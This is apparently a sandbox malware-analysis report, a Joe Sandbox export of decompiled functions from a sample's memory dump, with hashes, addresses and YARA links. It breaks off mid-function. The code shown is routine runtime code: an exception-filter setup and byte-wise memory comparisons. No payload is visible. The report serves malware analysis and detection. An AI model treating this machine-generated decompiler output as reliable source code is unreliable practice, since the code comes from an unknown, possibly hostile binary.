Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: CtrlDispatcherServiceStart
String ID:
API String ID: 3789849863-0
Opcode ID: ecc2e743742fd14b363423933abb2522c6c5b8d39346346ca3a9a3a2215dbd3e
Instruction ID: b50b43e7499e4a2b9fc1f96ea70aaf78fd3fb9264a7138d3cb26e41ec37885ff
Opcode Fuzzy Hash: ecc2e743742fd14b363423933abb2522c6c5b8d39346346ca3a9a3a2215dbd3e
Instruction Fuzzy Hash: 8AF0D07480160DDBDB45DFA5FC498AD7F78FB49314F510985C884E2154FB35A175CB81

Uniqueness

Uniqueness Score: -1.00%

Function 003A9DDD Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003A9DDD() {

				SetUnhandledExceptionFilter(E003A9D9B);
				return 0;
			}

0x003a9de2
0x003a9dea

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00029D9B), ref: 003A9DE2

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9732e47cf406e7f34e799397eaa1112807dd176d63c52700ac84704df1075303
Instruction ID: 152170e28d42b79d52c24ae74e600ee2001f3d2cd88a8e8c84e8a87999075ed0
Opcode Fuzzy Hash: 9732e47cf406e7f34e799397eaa1112807dd176d63c52700ac84704df1075303
Instruction Fuzzy Hash: 739002742512004E86123B705C4D9893598AA4A706B8B4851B001D4458DA9451415651

Uniqueness

Uniqueness Score: -1.00%

Function 003C102D Relevance: .4, Instructions: 355
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003C102D(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t205;
				signed char _t206;
				signed char _t207;
				signed char _t209;
				signed char _t210;
				signed int _t215;
				signed int _t291;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t333;
				void* _t335;
				void* _t337;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t291 = 0;
					L17:
					if(_t291 != 0) {
						goto L1;
					}
					_t205 =  *(_t196 - 0x1b);
					if(_t205 ==  *(_t200 - 0x1b)) {
						_t291 = 0;
						L28:
						if(_t291 != 0) {
							goto L1;
						}
						_t206 =  *(_t196 - 0x17);
						if(_t206 ==  *(_t200 - 0x17)) {
							_t291 = 0;
							L39:
							if(_t291 != 0) {
								goto L1;
							}
							_t207 =  *(_t196 - 0x13);
							if(_t207 ==  *(_t200 - 0x13)) {
								_t291 = 0;
								L50:
								if(_t291 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t291 = 0;
									L61:
									if(_t291 != 0) {
										goto L1;
									}
									_t209 =  *(_t196 - 0xb);
									if(_t209 ==  *(_t200 - 0xb)) {
										_t291 = 0;
										L72:
										if(_t291 != 0) {
											goto L1;
										}
										_t210 =  *(_t196 - 7);
										if(_t210 ==  *(_t200 - 7)) {
											_t291 = 0;
											L83:
											if(_t291 != 0) {
												goto L1;
											}
											_t294 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t294 == 0) {
												L5:
												_t296 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t296 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t8 = (0 | _t197 > 0x00000000) - 1; // -1
														_t197 = (_t197 > 0) + _t8;
													}
													L2:
													return _t197;
												}
												_t215 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												if(_t215 != 0) {
													L86:
													_t197 = _t215;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t215 = (0 | _t294 > 0x00000000) + (0 | _t294 > 0x00000000) - 1;
											if(_t215 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t298 = (_t210 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t298 == 0) {
											L76:
											_t300 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t300 == 0) {
												L78:
												_t302 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t302 == 0) {
													L80:
													_t291 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t291 != 0) {
														_t189 = (0 | _t291 > 0x00000000) - 1; // -1
														_t291 = (_t291 > 0) + _t189;
													}
													goto L83;
												}
												_t183 = (0 | _t302 > 0x00000000) - 1; // -1
												_t291 = (_t302 > 0) + _t183;
												if(_t291 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t177 = (0 | _t300 > 0x00000000) - 1; // -1
											_t291 = (_t300 > 0) + _t177;
											if(_t291 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t171 = (0 | _t298 > 0x00000000) - 1; // -1
										_t291 = (_t298 > 0) + _t171;
										if(_t291 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t305 = (_t209 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t305 == 0) {
										L65:
										_t307 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t307 == 0) {
											L67:
											_t309 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t309 == 0) {
												L69:
												_t291 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t291 != 0) {
													_t164 = (0 | _t291 > 0x00000000) - 1; // -1
													_t291 = (_t291 > 0) + _t164;
												}
												goto L72;
											}
											_t158 = (0 | _t309 > 0x00000000) - 1; // -1
											_t291 = (_t309 > 0) + _t158;
											if(_t291 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t152 = (0 | _t307 > 0x00000000) - 1; // -1
										_t291 = (_t307 > 0) + _t152;
										if(_t291 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t146 = (0 | _t305 > 0x00000000) - 1; // -1
									_t291 = (_t305 > 0) + _t146;
									if(_t291 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t312 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t312 == 0) {
									L54:
									_t314 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t314 == 0) {
										L56:
										_t316 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t316 == 0) {
											L58:
											_t291 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t291 != 0) {
												_t139 = (0 | _t291 > 0x00000000) - 1; // -1
												_t291 = (_t291 > 0) + _t139;
											}
											goto L61;
										}
										_t133 = (0 | _t316 > 0x00000000) - 1; // -1
										_t291 = (_t316 > 0) + _t133;
										if(_t291 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t127 = (0 | _t314 > 0x00000000) - 1; // -1
									_t291 = (_t314 > 0) + _t127;
									if(_t291 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t121 = (0 | _t312 > 0x00000000) - 1; // -1
								_t291 = (_t312 > 0) + _t121;
								if(_t291 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t319 = (_t207 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L43:
								_t321 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L45:
									_t323 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L47:
										_t291 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t291 != 0) {
											_t113 = (0 | _t291 > 0x00000000) - 1; // -1
											_t291 = (_t291 > 0) + _t113;
										}
										goto L50;
									}
									_t107 = (0 | _t323 > 0x00000000) - 1; // -1
									_t291 = (_t323 > 0) + _t107;
									if(_t291 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t101 = (0 | _t321 > 0x00000000) - 1; // -1
								_t291 = (_t321 > 0) + _t101;
								if(_t291 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t95 = (0 | _t319 > 0x00000000) - 1; // -1
							_t291 = (_t319 > 0) + _t95;
							if(_t291 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t326 = (_t206 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t326 == 0) {
							L32:
							_t328 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t328 == 0) {
								L34:
								_t330 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t330 == 0) {
									L36:
									_t291 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t291 != 0) {
										_t88 = (0 | _t291 > 0x00000000) - 1; // -1
										_t291 = (_t291 > 0) + _t88;
									}
									goto L39;
								}
								_t82 = (0 | _t330 > 0x00000000) - 1; // -1
								_t291 = (_t330 > 0) + _t82;
								if(_t291 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t76 = (0 | _t328 > 0x00000000) - 1; // -1
							_t291 = (_t328 > 0) + _t76;
							if(_t291 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t70 = (0 | _t326 > 0x00000000) - 1; // -1
						_t291 = (_t326 > 0) + _t70;
						if(_t291 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t333 = (_t205 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t333 == 0) {
						L21:
						_t335 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t335 == 0) {
							L23:
							_t337 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t337 == 0) {
								L25:
								_t291 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t291 != 0) {
									_t63 = (0 | _t291 > 0x00000000) - 1; // -1
									_t291 = (_t291 > 0) + _t63;
								}
								goto L28;
							}
							_t57 = (0 | _t337 > 0x00000000) - 1; // -1
							_t291 = (_t337 > 0) + _t57;
							if(_t291 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t51 = (0 | _t335 > 0x00000000) - 1; // -1
						_t291 = (_t335 > 0) + _t51;
						if(_t291 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t45 = (0 | _t333 > 0x00000000) - 1; // -1
					_t291 = (_t333 > 0) + _t45;
					if(_t291 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t38 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t38;
								}
								goto L17;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t32 = __edx - 1; // -1
							__esi = __edx + _t32;
							if(__edx + _t32 != 0) {
								goto L1;
							}
							goto L14;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t26 = __edx - 1; // -1
						__esi = __edx + _t26;
						if(__edx + _t26 != 0) {
							goto L1;
						}
						goto L12;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t20 = __edx - 1; // -1
					__esi = __edx + _t20;
					if(__edx + _t20 != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t291;
				goto L2;
			}

0x003c102d
0x003c102d
0x003c1033
0x003c10ab
0x003c10ad
0x003c10af
0x00000000
0x00000000
0x003c10b5
0x003c10bb
0x003c1132
0x003c1134
0x003c1136
0x00000000
0x00000000
0x003c113c
0x003c1142
0x003c11b9
0x003c11bb
0x003c11bd
0x00000000
0x00000000
0x003c11c3
0x003c11c9
0x003c1240
0x003c1242
0x003c1244
0x00000000
0x00000000
0x003c1250
0x003c12c8
0x003c12ca
0x003c12cc
0x00000000
0x00000000
0x003c12d2
0x003c12d8
0x003c134f
0x003c1351
0x003c1353
0x00000000
0x00000000
0x003c1359
0x003c135f
0x003c13d6
0x003c13d8
0x003c13da
0x00000000
0x00000000
0x003c13e8
0x003c13ea
0x003c1005
0x003c100d
0x003c100f
0x003c0c25
0x003c0c2d
0x003c0c2f
0x003c0c3c
0x003c0c3c
0x003c0c3c
0x003c086d
0x003c1511
0x003c1511
0x003c101c
0x003c1022
0x003c1403
0x003c1403
0x00000000
0x003c1028
0x00000000
0x003c1028
0x003c1022
0x003c13f7
0x003c13fd
0x00000000
0x00000000
0x00000000
0x003c13fd
0x003c1368
0x003c136a
0x003c137f
0x003c1387
0x003c1389
0x003c139e
0x003c13a6
0x003c13a8
0x003c13bd
0x003c13c5
0x003c13c7
0x003c13d0
0x003c13d0
0x003c13d0
0x00000000
0x003c13c7
0x003c13b1
0x003c13b1
0x003c13b7
0x00000000
0x00000000
0x00000000
0x003c13b7
0x003c1392
0x003c1392
0x003c1398
0x00000000
0x00000000
0x00000000
0x003c1398
0x003c1373
0x003c1373
0x003c1379
0x00000000
0x00000000
0x00000000
0x003c1379
0x003c12e1
0x003c12e3
0x003c12f8
0x003c1300
0x003c1302
0x003c1317
0x003c131f
0x003c1321
0x003c1336
0x003c133e
0x003c1340
0x003c1349
0x003c1349
0x003c1349
0x00000000
0x003c1340
0x003c132a
0x003c132a
0x003c1330
0x00000000
0x00000000
0x00000000
0x003c1330
0x003c130b
0x003c130b
0x003c1311
0x00000000
0x00000000
0x00000000
0x003c1311
0x003c12ec
0x003c12ec
0x003c12f2
0x00000000
0x00000000
0x00000000
0x003c12f2
0x003c125a
0x003c125c
0x003c1271
0x003c1279
0x003c127b
0x003c1290
0x003c1298
0x003c129a
0x003c12af
0x003c12b7
0x003c12b9
0x003c12c2
0x003c12c2
0x003c12c2
0x00000000
0x003c12b9
0x003c12a3
0x003c12a3
0x003c12a9
0x00000000
0x00000000
0x00000000
0x003c12a9
0x003c1284
0x003c1284
0x003c128a
0x00000000
0x00000000
0x00000000
0x003c128a
0x003c1265
0x003c1265
0x003c126b
0x00000000
0x00000000
0x00000000
0x003c126b
0x003c11d2
0x003c11d4
0x003c11e9
0x003c11f1
0x003c11f3
0x003c1208
0x003c1210
0x003c1212
0x003c1227
0x003c122f
0x003c1231
0x003c123a
0x003c123a
0x003c123a
0x00000000
0x003c1231
0x003c121b
0x003c121b
0x003c1221
0x00000000
0x00000000
0x00000000
0x003c1221
0x003c11fc
0x003c11fc
0x003c1202
0x00000000
0x00000000
0x00000000
0x003c1202
0x003c11dd
0x003c11dd
0x003c11e3
0x00000000
0x00000000
0x00000000
0x003c11e3
0x003c114b
0x003c114d
0x003c1162
0x003c116a
0x003c116c
0x003c1181
0x003c1189
0x003c118b
0x003c11a0
0x003c11a8
0x003c11aa
0x003c11b3
0x003c11b3
0x003c11b3
0x00000000
0x003c11aa
0x003c1194
0x003c1194
0x003c119a
0x00000000
0x00000000
0x00000000
0x003c119a
0x003c1175
0x003c1175
0x003c117b
0x00000000
0x00000000
0x00000000
0x003c117b
0x003c1156
0x003c1156
0x003c115c
0x00000000
0x00000000
0x00000000
0x003c115c
0x003c10c4
0x003c10c6
0x003c10db
0x003c10e3
0x003c10e5
0x003c10fa
0x003c1102
0x003c1104
0x003c1119
0x003c1121
0x003c1123
0x003c112c
0x003c112c
0x003c112c
0x00000000
0x003c1123
0x003c110d
0x003c110d
0x003c1113
0x00000000
0x00000000
0x00000000
0x003c1113
0x003c10ee
0x003c10ee
0x003c10f4
0x00000000
0x00000000
0x00000000
0x003c10f4
0x003c10cf
0x003c10cf
0x003c10d5
0x00000000
0x00000000
0x00000000
0x003c1035
0x003c1035
0x003c1039
0x003c103d
0x003c103f
0x003c1054
0x003c1054
0x003c1058
0x003c105c
0x003c105e
0x003c1073
0x003c1073
0x003c1077
0x003c107b
0x003c107d
0x003c1092
0x003c1092
0x003c1096
0x003c109a
0x003c109c
0x003c109e
0x003c10a5
0x003c10a5
0x003c10a5
0x00000000
0x003c109c
0x003c107f
0x003c1083
0x003c1086
0x003c1086
0x003c108c
0x00000000
0x00000000
0x00000000
0x003c108c
0x003c1060
0x003c1064
0x003c1067
0x003c1067
0x003c106d
0x00000000
0x00000000
0x00000000
0x003c106d
0x003c1041
0x003c1045
0x003c1048
0x003c1048
0x003c104e
0x00000000
0x00000000
0x00000000
0x003c104e
0x003c04ce
0x003c04ce
0x00000000

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 7fe0de812c73ad857f6d9234022a3519b4142f2d87d8e9db834f998fca36b432
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 0EC18E73D0B5F2458B3B412E0418B3BEE626E82B4032FC799DDD07F58AC626AD41A7D0

Uniqueness

Uniqueness Score: -1.00%

Function 003C0C45 Relevance: .3, Instructions: 349
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003C0C45(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t200;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t205;
				signed int _t210;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t324;
				void* _t326;
				void* _t328;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t284 = 0;
					L15:
					if(_t284 != 0) {
						goto L1;
					}
					_t200 =  *(_t191 - 0x1a);
					if(_t200 ==  *(_t195 - 0x1a)) {
						_t284 = 0;
						L26:
						if(_t284 != 0) {
							goto L1;
						}
						_t201 =  *(_t191 - 0x16);
						if(_t201 ==  *(_t195 - 0x16)) {
							_t284 = 0;
							L37:
							if(_t284 != 0) {
								goto L1;
							}
							_t202 =  *(_t191 - 0x12);
							if(_t202 ==  *(_t195 - 0x12)) {
								_t284 = 0;
								L48:
								if(_t284 != 0) {
									goto L1;
								}
								_t203 =  *(_t191 - 0xe);
								if(_t203 ==  *(_t195 - 0xe)) {
									_t284 = 0;
									L59:
									if(_t284 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t284 = 0;
										L70:
										if(_t284 != 0) {
											goto L1;
										}
										_t205 =  *(_t191 - 6);
										if(_t205 ==  *(_t195 - 6)) {
											_t284 = 0;
											L81:
											if(_t284 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t287 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t287 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t8 = (0 | _t192 > 0x00000000) - 1; // -1
													_t192 = (_t192 > 0) + _t8;
												}
												goto L3;
											}
											_t210 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
											if(_t210 != 0) {
												_t192 = _t210;
												goto L3;
											}
											goto L4;
										}
										_t289 = (_t205 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t289 == 0) {
											L74:
											_t291 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t291 == 0) {
												L76:
												_t293 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t293 == 0) {
													L78:
													_t284 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t284 != 0) {
														_t182 = (0 | _t284 > 0x00000000) - 1; // -1
														_t284 = (_t284 > 0) + _t182;
													}
													goto L81;
												}
												_t176 = (0 | _t293 > 0x00000000) - 1; // -1
												_t284 = (_t293 > 0) + _t176;
												if(_t284 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t170 = (0 | _t291 > 0x00000000) - 1; // -1
											_t284 = (_t291 > 0) + _t170;
											if(_t284 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t164 = (0 | _t289 > 0x00000000) - 1; // -1
										_t284 = (_t289 > 0) + _t164;
										if(_t284 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t296 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t296 == 0) {
										L63:
										_t298 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t298 == 0) {
											L65:
											_t300 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t300 == 0) {
												L67:
												_t284 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t284 != 0) {
													_t157 = (0 | _t284 > 0x00000000) - 1; // -1
													_t284 = (_t284 > 0) + _t157;
												}
												goto L70;
											}
											_t151 = (0 | _t300 > 0x00000000) - 1; // -1
											_t284 = (_t300 > 0) + _t151;
											if(_t284 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t145 = (0 | _t298 > 0x00000000) - 1; // -1
										_t284 = (_t298 > 0) + _t145;
										if(_t284 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t139 = (0 | _t296 > 0x00000000) - 1; // -1
									_t284 = (_t296 > 0) + _t139;
									if(_t284 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t303 = (_t203 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t303 == 0) {
									L52:
									_t305 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t305 == 0) {
										L54:
										_t307 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t307 == 0) {
											L56:
											_t284 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t284 != 0) {
												_t131 = (0 | _t284 > 0x00000000) - 1; // -1
												_t284 = (_t284 > 0) + _t131;
											}
											goto L59;
										}
										_t125 = (0 | _t307 > 0x00000000) - 1; // -1
										_t284 = (_t307 > 0) + _t125;
										if(_t284 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t119 = (0 | _t305 > 0x00000000) - 1; // -1
									_t284 = (_t305 > 0) + _t119;
									if(_t284 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t113 = (0 | _t303 > 0x00000000) - 1; // -1
								_t284 = (_t303 > 0) + _t113;
								if(_t284 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t310 = (_t202 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t284 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t284 != 0) {
											_t106 = (0 | _t284 > 0x00000000) - 1; // -1
											_t284 = (_t284 > 0) + _t106;
										}
										goto L48;
									}
									_t100 = (0 | _t314 > 0x00000000) - 1; // -1
									_t284 = (_t314 > 0) + _t100;
									if(_t284 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t94 = (0 | _t312 > 0x00000000) - 1; // -1
								_t284 = (_t312 > 0) + _t94;
								if(_t284 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t88 = (0 | _t310 > 0x00000000) - 1; // -1
							_t284 = (_t310 > 0) + _t88;
							if(_t284 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t317 = (_t201 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t317 == 0) {
							L30:
							_t319 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t319 == 0) {
								L32:
								_t321 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t321 == 0) {
									L34:
									_t284 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t284 != 0) {
										_t81 = (0 | _t284 > 0x00000000) - 1; // -1
										_t284 = (_t284 > 0) + _t81;
									}
									goto L37;
								}
								_t75 = (0 | _t321 > 0x00000000) - 1; // -1
								_t284 = (_t321 > 0) + _t75;
								if(_t284 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t69 = (0 | _t319 > 0x00000000) - 1; // -1
							_t284 = (_t319 > 0) + _t69;
							if(_t284 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t63 = (0 | _t317 > 0x00000000) - 1; // -1
						_t284 = (_t317 > 0) + _t63;
						if(_t284 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t324 = (_t200 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t324 == 0) {
						L19:
						_t326 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t326 == 0) {
							L21:
							_t328 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t328 == 0) {
								L23:
								_t284 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t284 != 0) {
									_t56 = (0 | _t284 > 0x00000000) - 1; // -1
									_t284 = (_t284 > 0) + _t56;
								}
								goto L26;
							}
							_t50 = (0 | _t328 > 0x00000000) - 1; // -1
							_t284 = (_t328 > 0) + _t50;
							if(_t284 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t44 = (0 | _t326 > 0x00000000) - 1; // -1
						_t284 = (_t326 > 0) + _t44;
						if(_t284 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t38 = (0 | _t324 > 0x00000000) - 1; // -1
					_t284 = (_t324 > 0) + _t38;
					if(_t284 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
